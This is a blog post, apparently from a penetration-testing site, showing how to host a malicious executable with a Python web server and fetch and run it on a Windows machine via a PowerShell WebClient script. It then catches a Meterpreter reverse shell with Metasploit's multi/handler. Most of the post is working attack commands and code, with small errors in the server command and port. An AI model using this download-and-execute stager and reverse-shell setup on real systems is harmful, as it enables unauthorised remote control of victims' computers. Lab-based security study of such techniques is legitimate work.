Powershell – Download and execute .exe

Posted byNickPosted inUncategorizedTags:

Here’s a simple script that will download and run an executable file from within Powershell.

First let’s serve up the file from our host machine. We can do this very quickly with python. Go to the directory where the file is stored, right click and start terminal from here. This will put you in a terminal window that is already in the directory of the file we want to serve up.

python3 -m http:server 8000

We now have a simple http server running and it is ready to serve up our malicious file.

Next create a Powershell script that will connect to this server and download the payload, then execute it.

$down = New-Object System.Net.WebClient
$url  = 'http://10.0.2.15:8080/MrBazza.exe';
$file = 'MrBazza.exe';
$down.DownloadFile($url,$file);
$exec = New-Object -com shell.application
$exec.shellexecute($file);

In the above code we are connecting to our server and downloading the executable file. It is then saved under a designated filename, and we then execute the file. This is saved as .ps1 file.

Finally, let’s setup a meterpreter session on our host machine ready to listen out for when the program is executed.

$ msfconsole

once the metasploit console is open, we will start out session.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.2.15
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit

This will start metasploit listening for our incoming connection.

The below screen shot shows both our open terminals, metasploit and the python server

Now, we go over to our windows machine, and we run our Powershell script. It will connect to our host web server, download and execute the file.

If we go back to our linux machine, we can see the logs of the python web server indicate the connection and downloading of the file, and we have our meterpreter session started. We can get details on the machine by using

meterpreter > sysinfo

So there is a quick and easy way to setup a web server with python, and serve up files that are automatically downloaded and executed using a Powershell script.

Advertisement

One thought on “Powershell – Download and execute .exe

  1. Pingback: Meterpreter hash dump with windows 10 – penetration test hacker

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

%d bloggers like this: